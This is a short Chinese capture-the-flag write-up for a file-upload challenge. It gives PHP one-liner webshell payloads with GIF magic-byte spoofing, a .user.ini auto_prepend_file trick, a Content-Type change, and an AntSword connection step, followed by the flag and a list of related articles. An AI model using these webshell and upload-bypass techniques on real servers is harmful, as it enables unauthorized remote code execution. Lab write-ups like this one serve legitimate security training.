CTF之easyupload

拿到题目发现是文件上传的漏洞,但是这个黑名单过滤的有点严格,无论是文件里还是文件后缀都不能出现php

那我们就用<?=eval($_POST['a']);?>来进行绕过(注意这里要加个GIF89a或者GIP87a进行欺骗)

但是后缀依然不能绕过怎么办?

接下来就要学新知识了

.user.ini文件

auto_prepend_file可以让所有的php文件自动的包含某个文件。

例如在.user.ini文件中写入

auto_prepend_file=shell.jpg

然后在shell.jpg中写入一个一句话木嘛

<?php eval($_P0ST['aaa']); ?>

那么和.user.ini和shell.jpg同一目录下的所有php文件都会包含shell.jpg文件。

这里上传.user.ini文件

文件里写:auto_prepend_file=a.jpg

注意:要进行抓包将文件类型改成Content-Type: image/jpeg并且也要加GIF89a或者GIF87a

然后再上传一个对应的木马文件,并且后缀为图片类型

最后就是用蚁剑连接了注意连接地址是/uploads/index.php

cyberpeace{8e50e0951cae4b39f7c312da788c71bb}

相关推荐
骥龙30 分钟前
3.10、构建网络防线:防火墙、WAF 与蜜罐实战
服务器·网络·数据库·网络安全
小白勇闯网安圈5 小时前
supersqli、web2、fileclude、Web_python_template_injection
python·网络安全·web
cypking5 小时前
Nuxt项目内网服务器域名代理访问故障排查
运维·服务器·php
北极糊的狐5 小时前
IDEA中安装 CamelCase 插件实现变量快速生成驼峰命名
开发语言·php
白帽子黑客罗哥6 小时前
零基础转行渗透测试 系统的学习流程(非常详细)
学习·网络安全·渗透测试·漏洞挖掘·护网行动
介一安全6 小时前
【Frida Android】实战篇13:企业常用非对称加密场景 Hook 教程
android·网络安全·逆向·安全性测试·frida
Suckerbin7 小时前
Gaara: 1靶场渗透
安全·web安全·网络安全
小白勇闯网安圈8 小时前
Training-WWW-Robots、command_execution、baby_web、xff_referer
网络安全·web
阿海5749 小时前
安装php7.4.33的shell脚本
php·shell
阿海5749 小时前
卸载php的shell脚本
开发语言·php